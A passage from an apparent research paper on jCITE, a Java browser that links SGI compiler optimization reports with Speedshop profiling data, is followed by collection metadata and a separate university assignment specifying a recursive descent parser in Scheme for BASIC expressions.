We address the difficulties encountered by application programmers by building a browser which helps them understand the performance impact of compiler optimizations. The design of jCITE focused on the following goals:

- Integration of the static information generated by the compiler with the dynamic information obtained by profiling the program.
- Presenting information at as high a level as possible. Both the profiling and compiler information are mapped to the original source program, but it is possible to simultaneously see the same code fragment as transformed source or assembly if the low-level information is necessary.
- Portability and smooth integration with Web browsers. We wanted to be able to run jCITE on any platform, and to make jCITE work under any Web browser.
- Ease of use. Generation and use of the extra information by the compiler and the profiler should be as simple as possible.
- Extendibility. It should be easy to add new functionality if required by a given set of applications.

The rest of this section shows how we have achieved those goals, from the point of view of specific design decisions.

3.2 Working with the jCITE browser

jCITE centers around the application source code. However, additional information is required to show anything more than the source code (jCITE itself does not perform any analysis of the source code—it combines information from the MIPS Pro compiler and the Speedshop run-time performance collection tools). Work with jCITE usually follows this pattern:

1. Compile the application with the -LIST:cite option.
2. Run the desired experiments with Speedshop.
3. Analyze the program with jCITE. If satisfied, stop.
4. Modify the source and/or change compiler options.
5. Go to step 1.

MIPS Pro compilers save the information in files whose names can be derived from the source file names. Running Speedshop is optional, but we highly recommend it, since the run-time information often offers invaluable insight into program behavior. We assume that the profiling information produced by Speedshop is saved in files whose names are derived from the application name and the monitored event name [9] (examples of events are clock cycles, primary data cache misses, secondary instruction cache misses, or floating point operations). It is the user's responsibility to save the profiling information in files with appropriate file names. This can be trivially achieved with a simple script, since the file names we use follow the same conventions for event names as the Speedshop tools. Upon start, jCITE searches the appropriate directories for compile-time and profile information and automatically configures itself to use all available information.

3.3 jCITE: Why implement in Java?
Why did we choose to implement jCITE in Java?

1. Portability. We wanted the jCITE browser to work on a variety of platforms. For example, we wanted eventually to be able to connect to an Origin2000 from an SGI O2, Apple Power Mac, or Compaq Presario using the jCITE browser.
2. High-level component (Java Bean) availability for spreadsheets, and a variety of graphics components for visual display of information. We wanted the jCITE browser to be extendable by others using components written by other ISVs developing for Java.
3. Live documentation accessible through Web browsers. We wanted jCITE to be able to run within a Web browser. This would allow potential customers to get a feel for what the SGI compilers and performance tools can do over the Internet.

Implementing in Java was fun, but we encountered a number of performance problems which we discuss in the final section.

3.4 Generating compiler information

The SGI MIPS Pro compiler has special options that allow it to produce listing files that describe the loop optimizations it performed. Since the loop nest optimizations are fairly high level, it may be desirable to view the code after the loop nest optimizations. To accomplish this, the SGI MIPS Pro compiler provides translators from its internal format back to Fortran or C. These translators can be invoked using listing options in the compiler. Other optimizations, such as inner loop unrolling, software pipelining, and local scheduling, produce compiler information by embedding it in the assembly file as comments. The compiler produces a variety of information for jCITE, including:

- **Loop Nest Information**, including register and cache blocking, dependence problems, fission, and fusion.
- **Prefetch Information**, which includes the array references that are prefetched and whether they are for the L1 or L2 cache, the confidence numbers for them, and other details such as the volume that is prefetched in a given loop per iteration.
- **Structure of Loop Nests**, which is a sketch of the loop structure after all the loop-level transformations. This information helps identify whether a loop was a wind-down loop, a regular loop, or a peeled loop. It also gives the number of iterations the loop is going to execute, or an estimate of the trip count.
- **Software Pipelining Information**, which provides the number of cycles it takes to execute an inner loop. It also gives the number of integer operations and floating point operations, as well as what percent of the processor's peak the operations achieve. If an inner loop did not pipeline, the reasons are also given. Similar information is provided by the scheduler for loops that are not inner loops.
- **Inner Loop Unrolling Information**, which gives the factor by which inner loops were unrolled. If a loop was not unrolled, it lists why.
- **Parallelization Information**, which tells which loops the automatic parallelizer expects to run in parallel, as well as the regions of the various arrays that are written and read.

3.5 Running and examining performance experiments

The MIPS Pro compilers include the Speedshop package. Speedshop is the generic name for an integrated package of performance tools that run performance experiments on executables and examine the results of those experiments. Experiments are recorded using the ssrun command, as follows:

```
ssrun -<exptype> <a.out-name> <a.out arguments>
```

where `<exptype>` is one of the named experiments.
A common experiment is PC sampling: the program counter is statistically sampled, using 16-bit bins, based on user and system time, with a sample interval of 10 milliseconds. The size of the sampling interval and the size of the bins can both be controlled. On the R10000, which has hardware performance counters, a variety of other statistical PC sampling experiments can be performed [11, 9]. These include (among others):

- **Cycle Counts**, which uses statistical PC sampling based on overflows of the cycle hardware performance counter.
- **Primary Data Cache Misses**, which uses statistical PC sampling based on overflows of the primary data-cache miss counter.
- **Secondary Data Cache Misses**, which uses statistical PC sampling based on overflows of the secondary data-cache miss counter.

The `prof` command is used to generate a report about a specified experiment. jCITE assumes that the `prof` command has been run to produce the performance experiment data file.

3.6 Inner workings of jCITE

The high-level structure of jCITE is presented in **Figure 6**. Upon start, jCITE looks for all files which are associated with the application. First the source and transformed source files are read and the data structures representing them are created. The file which describes the mapping between lines in the two sources is parsed with an S-expression reader, and the sources are annotated with the appropriate mappings. The S-expression reader is invoked again to read the LNO (Loop Nest Optimizer) information, which is attached to the internal representation of the source. Next the profile information produced by Speedshop is read and attached to the corresponding sources. The data structures are organized so that all this information can be quickly accessed. Whenever needed, additional data structures are created to contain local information extracted from the global data structures. For example, on a mouse click for a given source line, the data structures associated with that source file, as well as the data structures for that specific line, are searched and the information is merged into the pop-up menu data structure, which contains the labels to be placed in the menu and the actions to be performed if a menu item is selected. This data structure is passed to the method which displays and handles pop-up menus. Similarly, when the user adds a new histogram to the currently displayed source, a data structure for that histogram is created and inserted into the UI container displaying that source.

4 Experiments

In this section we present some of the experiments that we did using jCITE. We have not yet released jCITE to a wide audience.

4.1 Performance tuning the compiler

We present two examples. The first one is a real-world application from the supercomputing group within SGI. The core of the application was a subroutine mai.opel_Track3d. They were not happy with the performance of this subroutine and wanted us to examine it closely. It had an inner loop that was 448 lines long. The MIPS Pro 7.x compiler fissioned this loop into 15 loops, but the software pipeliner was able to pipeline only some of them. The assembly code was almost impossible to decipher, since the code generator had unrolled all the loops and had also introduced unroll remainder loops. We extended jCITE with a simple script that told us the cycles each of the loops consumed after the fissioning and whether each loop was software pipelined or not.
Using this information we were able to tune the loop fissioner to produce a better balance of fissioned loops, which resulted in all the fissioned loops getting software pipelined.

We encountered the second example when we were tracking a regression in the SPEC95 applu benchmark between compiler releases. We used a combination of runtime performance information and compiler information to track and fix this problem. In one of the frequently executed subroutines, two subroutines it called were inlined together to produce a bigger routine that has two outer loops iterating over the same space. The earlier version of the compiler was able to fuse the two loops together, but the later version was not. Using jCITE we identified the problem: a label that was introduced between the two loops due to inlining was not being removed, causing the loop nest optimizer to not fuse the loops.

4.2 Hand tuning the SPEC95 130.li integer benchmark

We wanted to see if we could use jCITE to tune programs other than scientific programs. We took upon ourselves a challenge to see if we could improve an arbitrary integer program. We chose the lisp interpreter 130.li for several reasons:

- We gave ourselves 3–4 days to tune the program and wanted a large enough program, but not too large. 130.li was among the larger SPEC95 benchmarks.
- We wanted to give feedback to the optimizer group if we found anything interesting.
- SPEC95 programs are optimized only using compiler flags, and we were curious to see how much better hand optimization could do.

We first profiled the program and, on looking at the application hot-spots using jCITE, determined the following optimization opportunities:

Opt1: The compiler was not recovering common subexpressions across basic blocks. We recoded the macros consp and listp to use fast versions when their argument was evaluated to be not null in a prior basic block.

Opt2: Varargs routines were not being inlined. We specialized the varargs routine into 7 different versions and changed all the call sites to use the right version. We also cleaned up the body of the varargs routine to no longer loop through the varargs. For example, void func_vararg(int *args,...) when used with one and two arguments could be recoded as void func_1(int *arg1) and void func_2(int *arg1, int *arg2), respectively.

Opt3: Switch statements were compiled in a table-driven fashion. We wanted to use 'if' statements in a few cases.

Opt4: If a recursive procedure has a fast return path for empty arguments, the register allocator today spills registers on entry to the function and restores them across the fast return path. We recoded the procedure to eliminate the condition check and moved the condition to the caller.

Opt5: We observed that some of the compares could be converted to bit operations to do the compares faster. This is an optimization that we do not believe a compiler would be able to do.

Opt2 and Opt4 need an interprocedural optimizer. Opt5 is not possible through a compiler. Opt1 and Opt3 are doable by a good optimizer. Here are the experimental measurements on an Origin2000 machine with an R10000 processor. We used the hardware cycle counter to get an estimate of where to start looking.
<table> <thead> <tr> <th>Optimization attempted</th> <th>Measured Time</th> <th>Percentage improvement over base case (cumulative)</th> </tr> </thead> <tbody> <tr> <td>Original</td> <td>119.616u 0.095s 2:00.30</td> <td>0%</td> </tr> <tr> <td>Opt1 (redundant checks)</td> <td>119.199u 0.161s 1:59.98</td> <td>negligible</td> </tr> <tr> <td>Opt2 (no var args just in xleval.c)</td> <td>113.797u 0.091s 1:54.48</td> <td>4.8%</td> </tr> <tr> <td>Opt2.1 (no var args everywhere)</td> <td>107.821u 0.152s 1:48.57</td> <td>9.8%</td> </tr> <tr> <td>Opt3 (converted switch to if condition for livecar/livecdr)</td> <td>101.505u 0.074s 1:42.08</td> <td>15.1%</td> </tr> <tr> <td>Opt4 (moved if (arg == NULL) return; out of mark to caller)</td> <td>97.188u 0.079s 1:37.77</td> <td>18.7%</td> </tr> <tr> <td>Opt5 (bit operations instead of compares)</td> <td>92.498u 0.077s 1:33.06</td> <td>23%</td> </tr> </tbody> </table> As the table shows with 3–4 days of work we were able to get close to 23% improvement over the base case. We compiled the base case to use the new ABI, interprocedural inlining, -O3 optimization, targeting the R10000 processor (-Ofast). 5 Lessons learned and conclusions In this paper we have described a Java based browser that will be valuable for a performance oriented programmer. We are not aware of any software that provide such extensive compiler optimization information as well as combines runtime performance information with compiler optimization information in a visually appealing way either in academia or industry. We learned several things from designing and implementing jCITE. - Combining compiler information with runtime performance information can lead to new insights into how program performance matches the hardware. - Novel visual display are much more attractive in presenting performance data than static text data. Correlating data to provide information is even more useful. Browsers for performance programming should strive for high bandwidth (more information) to the user. - Java specific lessons: - Java based technology promises portability, better client software on Unix machines, and much more of a chance for ISV’s to participate in providing tools for high end programming like scientific and engineering programming. - GUI portability has a price: performance. The state of art of Java compilers and components are not yet sufficient to develop large scale portable GUI software. - Using multi threading safe data structures such as Vectors [2] are expensive today on most platforms even when the application is single threaded. jCITE uses Vectors in a number of places. - The I/O performance of Java VM’s we have used have mostly been insufficient for programs such as jCITE that read lots of files. - The lack of features in AWT (JDK 1.0.2) such as pop-up menus, cut and paste was disheartening. Several of these deficiencies have been fixed in JDK 1.1 [6]. Sun has also provided a road map for lightweight and fast UI components. The competition in the UI between Microsoft’s AFC and Sun’s JFC is going to lead to much better UI software similar to what we witnessed in Browser wars and the technology that was swept with it. - It is better to design a lightweight browser from the ground up for performance programming than integrate functionality into a fully functional editor. jCITE’s precursor CITE was written entirely in Emacs Lisp and worked within Lucid’s XEmacs. CITE was heavyweight due to it’s dependence on XEmacs. 
Also, religious wars over the choice of editors are better left to newsgroups than to products.

5.1 Related Work

Sigma [8] was a project at Indiana University. It had an Emacs-based front-end which allowed interactive transformations to be applied to a program. It had a library to examine and manipulate the intermediate representation of the program. It was intended more as a restructuring tool than as a tool for performance programming.

The program analysis group at Microsoft Research [5] is developing advanced programming tools. Their programming tool is currently Emacs-based and uses the results of their intra- and interprocedural program analysis. Their system differs from ours in that their focus is on issues such as alias and dataflow analysis in the context of C and C++ programs. We also plan to incorporate results of the alias analysis from our compiler into our programming tool.

The Parascope programming environment, the D editor [3], and the subsequent work at Rice on a compilation and performance evaluation environment are similar in spirit to ours. They focus more on data parallel programs in a message passing environment. We plan to incorporate results from data distributions for parallel programs running on scalable shared memory machines, which are being developed in our compiler, into our programming tool.

SGI's Workshop MPF tool [7] provides information on KAI parallelizer optimizations. It is written to work only on SGI machines. KAI [4] has announced a new suite of tools written in Java to provide portability. They are also working towards providing portability of the parallel directives across a number of platforms so that ISVs can migrate their parallel code easily across platforms.

References

Figure 1: SYNCHRONIZING ORIGINAL SOURCE and TRANSFORMED SOURCE: The example shown is matrix multiply (mmjik200) of two 200x200 matrices. The window on the left is the original source and the window on the right is the transformed source. (View in color)

Figure 2: EXAMPLE OF COMPILER INFORMATION FOR THE mmjik200 LOOP NEST: This information is produced by the compiler in a separate file that jCITE knows about and can read. It has information on various loop optimizations including cache blocking, register blocking, fission/fusion, and prefetching.

Figure 3: ANNOTATED PERFORMANCE INFORMATION ON THE SOURCE: The example shown is from the SPEC95 fp benchmark 107.mgrid. The left window is the original source annotated with cycle counts from the R10000 hardware counters and parallelization information. A histogram view of the per-line cycle counts is overlaid on top of the source window. Navigating the histogram navigates the source and transformed source. The snapshot was taken with the mouse in the histogram window at the line with the largest number of cycles (43.4% of all cycles). This corresponds to the 3D array assignment in the subroutine resid.

Figure 4: COMBINING PERFORMANCE INFORMATION and COMPILER INFORMATION: The example shown is from the SPEC95 fp benchmark 107.mgrid. The left window is the original source annotated with cycle counts and secondary cache miss counts from the R10000 hardware counters. The histogram overlays show the overall cycle counts and cache misses. The frame at the bottom is the result of a query to obtain the compiler optimization information.

Figure 5: BLACK BOX ARCHITECTURE: jCITE takes several inputs: the original source, the transformed source, the assembly, the compiler information file, and performance experiment data files, if any.
Its output is a visual representation showing how all of its inputs relate to one another, for example how the original source and the transformed source correspond. At present jCITE works for Fortran 77 and C.

Figure 6: **INTERNALS of jCITE**: Two main components, the READERS and the UI ABSTRACTIONS.
{"Source-Url": "http://aspen.ucs.indiana.edu/pss/pcrc/doc/rochester/java-cite.pdf", "len_cl100k_base": 6507, "olmocr-version": "0.1.49", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 32744, "total-output-tokens": 7811, "length": "2e12", "weborganizer": {"__label__adult": 0.00029540061950683594, "__label__art_design": 0.0002765655517578125, "__label__crime_law": 0.0002830028533935547, "__label__education_jobs": 0.0005154609680175781, "__label__entertainment": 6.312131881713867e-05, "__label__fashion_beauty": 0.00013971328735351562, "__label__finance_business": 0.00019633769989013672, "__label__food_dining": 0.00028967857360839844, "__label__games": 0.0004580020904541016, "__label__hardware": 0.0019102096557617188, "__label__health": 0.0004127025604248047, "__label__history": 0.0002186298370361328, "__label__home_hobbies": 9.638071060180664e-05, "__label__industrial": 0.0005636215209960938, "__label__literature": 0.00016260147094726562, "__label__politics": 0.00020456314086914065, "__label__religion": 0.00047397613525390625, "__label__science_tech": 0.043304443359375, "__label__social_life": 7.385015487670898e-05, "__label__software": 0.008544921875, "__label__software_dev": 0.9404296875, "__label__sports_fitness": 0.00032782554626464844, "__label__transportation": 0.0005469322204589844, "__label__travel": 0.00018584728240966797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33629, 0.0252]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33629, 0.4782]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33629, 0.9208]], "google_gemma-3-12b-it_contains_pii": [[0, 3524, false], [3524, 6808, null], [6808, 10403, null], [10403, 13417, null], [13417, 17071, null], [17071, 20923, null], [20923, 24245, null], [24245, 27957, null], [27957, 31539, null], [31539, 31803, null], [31803, 32091, null], [32091, 32695, null], [32695, 33138, null], [33138, 33538, null], [33538, 33629, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3524, true], [3524, 6808, null], [6808, 10403, null], [10403, 13417, null], [13417, 17071, null], [17071, 20923, null], [20923, 24245, null], [24245, 27957, null], [27957, 31539, null], [31539, 31803, null], [31803, 32091, null], [32091, 32695, null], [32695, 33138, null], [33138, 33538, null], [33538, 33629, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33629, null]], "pdf_page_numbers": [[0, 3524, 1], [3524, 6808, 2], [6808, 10403, 3], [10403, 13417, 4], [13417, 17071, 5], [17071, 20923, 6], [20923, 24245, 7], [24245, 27957, 8], [27957, 31539, 9], [31539, 31803, 10], [31803, 32091, 11], 
[32091, 32695, 12], [32695, 33138, 13], [33138, 33538, 14], [33538, 33629, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33629, 0.05114]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
09fd7e9c883b7dcef34247171e19a5cd0275213d
In this assignment you will write a set of procedures for parsing various token sequences that appear in programs written in the BASIC language. The code that we write in this assignment will be used as part of a larger project in our next assignment, Homework 8, which will be an interpreter for a subset of BASIC syntax (including but not limited to expressions). Include your answers in a file named `parser.scm`. A skeleton of this file is provided on the web site.

### Background Information about Parsing:

A grammar is a set of syntax rules that collectively describe a language. Parsing (syntactic analysis) is the process of analyzing a text, made of a sequence of tokens, to determine its grammatical structure with respect to a given grammar. A parser is a component in an interpreter or compiler that checks for correct syntax. In a compiler, the parser often builds a tree, list, or other hierarchical structure from the input tokens. An interpreter instead runs the code as it parses it. Parsing is often considered to be distinct from lexical analysis, which is the process of reading each character of text in a program and splitting up those characters into a set of tokens.

A top-down parser looks at the sequence of tokens in order from start to finish, trying to "expand" its understanding of the program elements from large items (such as a program or function) down to small ones (such as a single expression). By contrast, a bottom-up parser begins by identifying the smallest and simplest symbols in the program first, then expanding outward from them to discover their context within larger forms such as expressions, statements, functions, etc.

In this assignment you will write a particular subcategory of top-down parser known as a recursive descent parser. In a recursive descent parser, you begin with a grammar for the language of interest, and you use that grammar to write a series of procedures, one for each major non-terminal symbol and/or production rule in that grammar. As your parser reads tokens of input, you use the sequences and values of those tokens to decide which of your procedures to call. Since some forms can contain themselves (for example, an expression can contain other expressions), you sometimes end up with one of your production procedures calling itself; or you end up with a chain of calls such as \( a \rightarrow b \rightarrow c \rightarrow a \). In this sense the parser is recursive. Its descent is the path that it walks through the grammar rules and their associated functions as it parses the various tokens of the program that you feed to it.

### Our Language's Grammar:

Our grammar below is in a format called Extended Backus-Naur Form (EBNF). It has the following production rules:

- `<test>` ::= `<expression>` `("=" | "<" | ">" | "<=" | ">=" | "<>")` `<expression>`
- `<expression>` ::= `<term>` `{("+" | "-") <term>}`
- `<term>` ::= `<element>` `{("*" | "/") <element>}`
- `<element>` ::= `<factor>` `{"^" <factor>}`
- `<factor>` ::= `<number>` | `("+" | "-") <factor>` | `"(" <expression> ")"` | `<f> "(" <expression> ")"`
- `<f>` ::= `SIN` | `COS` | `TAN` | `ATN` | `EXP` | `ABS` | `LOG` | `SQR` | `RND` | `INT`

Here are some details about EBNF:

- The pipe character ("|") means "or." The final rule says that an `<f>` is either `SIN` or `COS` or `TAN`, and so on.
- Curly braces indicate "0 or more of." For example, the production for `<element>` indicates that it is composed of a `<factor>` followed by 0 or more occurrences of "^ `<factor>`".
So it would match sequences like this: `<factor>` ^ `<factor>` ^ `<factor>` ^ `<factor>` ^ `<factor>`

- Tokens shown in quotes in the grammar represent literal values. In Scheme these will be stored as symbols.
- Parentheses are used to group subparts of a rule. For example, the `<expression>` rule uses parentheses to indicate that terms are separated by either a plus or a minus, as in: `<term>` + `<term>` + `<term>` - `<term>` + `<term>` - `<term>` - `<term>`

You should define a procedure to parse each of the five major elements described above. The sixth rule is slightly different (described below). Each of your procedures will take a list of tokens as its parameter. It should consume tokens from the list and replace those tokens with the value obtained by evaluating the tokens. For example, `parse-term` evaluates the multiplicative operators `*` and `/`. If it is passed the list `(2.5 * 3.4 / 2 THEN 210)`, it will evaluate `2.5 * 3.4 / 2`, obtain `4.25`, and replace the tokens it parsed with `4.25`, returning the list `(4.25 THEN 210)`.

These procedures are "greedy" in that they will consume as many tokens from the front of the list as they can that can be part of the given grammar element. Above, the token `THEN` can't be part of a term, so the procedure stops consuming tokens when it encounters it. Though it is greedy, it should pay attention only to tokens that appear at the front of the list.

Parentheses are difficult to handle as symbols, so we'll use the tokens `lparen` and `rparen` for left and right parentheses.

There are several cases where Scheme returns rational numbers when we would prefer to obtain real numbers. For example, division can produce such results, as can exponentiation with integers where the exponent is negative:

```
> (/ 3 4)
3/4
> (expt 3 -2)
1/9
```

For these cases, you should call the `exact->inexact` procedure to convert the rational to a real number:

```
> (exact->inexact (/ 3 4))
0.75
> (exact->inexact (expt 3 -2))
0.1111111111111111
```

**Procedures to Implement:**

You are to write the following parsing procedures *(also see the end of this spec for a suggested development strategy)*:

1. **parse-factor**

Write a procedure `parse-factor` that parses a factor at the front of a list, replacing the tokens that were part of the factor with the numeric value of the factor. Recall the grammar rule for a factor:

```plaintext
<factor> ::= <number>
           | ("+" | "-") <factor>
           | "(" <expression> ")"
           | <f> "(" <expression> ")"
```

As indicated in the grammar, a factor is either a simple number, or a sign followed by a factor (e.g., the negation of a number), or a parenthesized expression, or a parenthesized call on a function. For example:

```
> (parse-factor '(3.5 2.9 OTHER STUFF))
(3.5 2.9 OTHER STUFF)
> (parse-factor '(- 7.9 3.4 * 7.2))
(-7.9 3.4 * 7.2)
> (parse-factor '(lparen 7.3 - 3.4 rparen + 3.4))
(3.9 + 3.4)
> (parse-factor '(SQR lparen 12 + 3 * 6 - 5 rparen))
(5)
> (parse-factor '(- lparen 2 + 2 rparen * 4.5))
(-4 * 4.5)
```

Keep in mind that your procedures should be greedy, but not overly greedy. For example:

```
> (parse-factor '(- 13 - 17 - 9))
(-13 - 17 - 9)
```

Only the first combination of minus and number is turned into a negative number. The procedure should process just one factor at the front of the list, not multiple factors.

2. **parse-element**

Write a procedure `parse-element` that parses an element at the front of a list, replacing the tokens that were part of the element with the numeric value of the element.
Recall the grammar rule for an element:

```plaintext
<element> ::= <factor> {"^" <factor>}
```

As indicated in the grammar, an element is a series of one or more factors separated by the token `^`, which indicates exponentiation. Your procedure should be "greedy"; it should consume as many tokens as possible that could be part of an element. The `^` operators should be evaluated left-to-right. You can call the standard `expt` procedure to compute the exponent. As noted above, the result can be a rational number when the exponent is negative, so you need to call `exact->inexact` in that case to convert from a rational to a real number. Below are several examples of `parse-element`'s intended behavior:

```
> (parse-element '(2 ^ 2 ^ 3 THEN 450))
(64 THEN 450)
> (parse-element '(2 ^ 2 ^ -3 THEN 450))
(0.015625 THEN 450)
> (parse-element '(2.3 ^ 4.5 * 7.3))
(42.43998894277659 * 7.3)
> (parse-element '(7.4 + 2.3))
(7.4 + 2.3)
> (parse-element '(2 ^ 3 ^ 4 ^ 5 2 ^ 3 4 ^ 5))
(1152921504606846976 2 ^ 3 4 ^ 5)
```

3. **parse-term**

Write a procedure `parse-term` that parses a term at the front of a list, replacing the tokens that were part of the term with the numeric value of the term. Recall the grammar rule for a term:

```plaintext
<term> ::= <element> {("*" | "/") <element>}
```

As indicated in the grammar, a term is a series of elements separated by the tokens `*` and `/` (multiplication and division). Your procedure should consume as many tokens as possible that could be part of a term. The `*` and `/` operators should be evaluated left-to-right. Scheme will potentially return a rational number when we use division, which we don't want. So for each division, return the value obtained by passing the result to the standard Scheme procedure `exact->inexact`, as in `(exact->inexact 7/8)`, which returns `0.875`. For example:

```
> (parse-term '(2.5 * 4 + 9.8))
(10.0 + 9.8)
> (parse-term '(38.7 / 2 / 3 THEN 210))
(6.45 THEN 210)
> (parse-term '(7.4 * lparen 2.4 - 3.8 rparen / 4 - 8.7))
(-2.59 - 8.7)
> (parse-term '(3 / 4 + 9.7))
(0.75 + 9.7)
> (parse-term '(2 * 3 * 4 + 3 * 8))
(24 + 3 * 8)
> (parse-term '(24 / 2 - 13.4))
(12.0 - 13.4)
```

4. **parse-expression**

Write a procedure `parse-expression` that parses an expression at the front of a list, replacing the tokens that were part of the expression with the numeric value of the expression. Recall the grammar rule for an expression:

```plaintext
<expression> ::= <term> {("+" | "-") <term>}
```

As indicated in the grammar, an expression is a series of terms separated by the tokens `+` and `-` (addition and subtraction). Your procedure should consume as many tokens as possible that could be part of an expression. The `+` and `-` operators should be evaluated left-to-right.
For example:

```
> (parse-expression '(12.4 - 7.8 * 3.5 THEN 40))
(-14.9 THEN 40)
> (parse-expression '(2 + 3.4 - 7.9 <= 7.4))
(-2.5 <= 7.4)
> (parse-expression '(3 * 4 ^ 2 / 5 + SIN lparen 2 rparen))
(10.50929742682568)
> (parse-expression '(15 - 3 - 2 foo 2 + 2))
(10 foo 2 + 2)
```

5. **parse-test**

Write a procedure `parse-test` that parses a test at the front of the list, replacing the tokens that were part of the test with the boolean value of the test (`#t` or `#f`). Recall the grammar rule for a test:

```plaintext
<test> ::= <expression> ("=" | "<" | ">" | "<=" | ">=" | "<>") <expression>
```

As indicated in the grammar, a test is an expression followed by a relational operator, then an expression. For example:

```
> (parse-test '(3.4 < 7.8 THEN 19))
(#t THEN 19)
> (parse-test '(2.3 - 4.7 ^ 2.4 <> SQR lparen 8 - 4.2 ^ 2 * 9 rparen FOO))
(#t FOO)
> (parse-test '(2 ^ 4 = 4 ^ 2))
(#t)
```

The sixth grammar rule has a list of function names. Because it doesn't mention any other grammar elements, it doesn't need its own parsing procedure. You are welcome to define a helper procedure that processes it, but it's not a requirement. In evaluating expressions involving these functions, you will need to translate the named function into a Scheme procedure. The skeleton file includes the following association list that will help you to accomplish this task:

```
(define functions '((SIN . sin) (COS . cos) (TAN . tan) (ATN . atan) (EXP . exp)
                    (ABS . abs) (LOG . log) (SQR . sqrt) (RND . rand) (INT . trunc)))
```

Each element of the association list is a dotted pair where the car is a key and the cdr is a value (like a Map in Java). Scheme has a standard procedure called `assoc` that will search for a particular key. For example, given the list above, the expression `(assoc 'ATN functions)` returns `(ATN . atan)`. To get the `atan` symbol from this, you'd take the cdr of the pair object. Because it's an improper dotted pair and not a list, you use `cdr` instead of `cadr`. If the key is not found, as in the call `(assoc 'FOO functions)`, you get `#f` (false) as a result.

**Error-Handling:**

In your parse routines, you should test for potential errors and should call the `error` procedure if an error is encountered. The call should indicate which parsing routine detected the error. Execute one of the following five calls:

```
(error "illegal test")
(error "illegal expression")
(error "illegal term")
(error "illegal element")
(error "illegal factor")
```

Most errors will be detected by `parse-factor` since it is the lowest-level construct in the grammar. In grading, we won't be concerned about which of your parsing methods detects the error. All that we care about is that your code generates the error (versus, say, calling `car` on an empty list). Below are some examples of calls that should produce errors:

```
(parse-term '(2.5 * 4 *))          ; no number after second *
(parse-factor '(foo bar))          ; the symbol foo is not a legal factor
(parse-factor '(- foo))            ; a minus must be followed by a factor
(parse-term '(3 * foo))            ; no number after *
(parse-factor '(lparen rparen))    ; needs an expression between parens
(parse-factor '(lparen 2 + 3 4))   ; no right paren when we encounter 4
```

**Suggested Development Strategy:**

First, write a simple version of `parse-factor`. Have it handle a number. This is a pretty trivial case, because it just puts the number back at the front of the list. But then have it handle the rule where a factor can be a sign followed by a factor.
Whenever you see a non-terminal on the right side of a grammar rule, you know that it should be handled by a call on the corresponding parsing procedure. So this is a case where `parse-factor` is going to call `parse-factor`. If you code this correctly, you should be able to handle cases like this:

```
> (parse-factor '(2 + 2))
(2 + 2)
> (parse-factor '(- 2 + 2))
(-2 + 2)
> (parse-factor '(- - 2 + 2))
(2 + 2)
> (parse-factor '(- - - - 2 2))
(2 2)
> (parse-factor '(+ - - + + - + + 2 2))
(-2 2)
```

Second, write `parse-element`. It has to handle the case where there is just a factor and the case where that is followed by zero or more of an up-arrow followed by a factor, as in:

```
> (parse-element '(2 + 2))
(2 + 2)
> (parse-element '(- - - 2 + 2))
(-2 + 2)
> (parse-element '(2 ^ 3 - 4))
(8 - 4)
> (parse-element '(2 ^ - - - 3 * 17))
(0.125 * 17)
> (parse-element '(2 ^ 3 ^ 2 / 14))
(64 / 14)
> (parse-element '(- - - 7 ^ - - - - 4 ^ - - - 2 < 74.5))
(1.7346652555743034e-007 < 74.5)
```

(Remember that the grouping is left-to-right.)

Third, write `parse-term` and `parse-expression`. You could initially have `parse-term` handle just multiplication and `parse-expression` handle just addition. That makes them look a lot like `parse-element`.

Fourth, go back to `parse-factor` and have it deal with parenthesized expressions. Then deal with function calls.

Fifth, write `parse-test`.

Sixth, finish whatever you left unfinished (e.g., if you had `parse-expression` do just addition, then have it handle subtraction as well), including testing for errors.

Recall that you can use the DrScheme debugger to step through the execution of your various procedures to find bugs. You can also insert calls to the `display` procedure to view printed output on the console while your code is running.

If you produce any test cases or testing code for this assignment, you are welcome to share it with your classmates using our course discussion forum. Any shared testing code may test for external behavior but may not test any aspects of the internal correctness of the student's Scheme source code itself. The instructor and TAs reserve the right to remove testing code that we feel is inappropriate for any reason.

**Grading and Submission:**

Submit your finished **parser.scm** file electronically using the link on the class web page. For reference, our solution is roughly 150 lines (70 "substantive" lines) long according to the course Indenter page. You don't need to match this number or even come close to it; it is just a rough guideline.

Your program should not produce syntax or runtime **errors** when executed. You may lose points if you name your procedures or top-level values incorrectly, even if their behavior is correct. Your code should work for both basic and advanced cases. Perform your own **testing**, and remember to test edge cases.

You should not use any of Scheme's language features that involve **mutation**, such as the `set!`, `set-car!`, or `mcons` procedures. You are not allowed to use mutable lists or vectors in solving this problem. You should not define any Scheme **macros**. Your code should compile and execute properly using the "Pretty Big" language level of PLT Scheme. Otherwise you may use any Scheme library constructs you like to help you solve a problem unless those constructs are explicitly forbidden by this spec or the problem description.
As always, if the solution to one procedure is useful in helping you solve a later procedure, you should call the earlier procedure from the later procedure. You can include any testing code you develop (although it should be labeled as such).

You may define other **global variables or procedures** not described in this document, as long as they are non-trivial and are used by more than one top-level procedure specified in this document. If you write inner helper procedures, choose a suitable set of **parameters** for each one. Don't pass unnecessary parameters or parameters that are unmodified duplicates of existing bound parameters from the outer procedure.

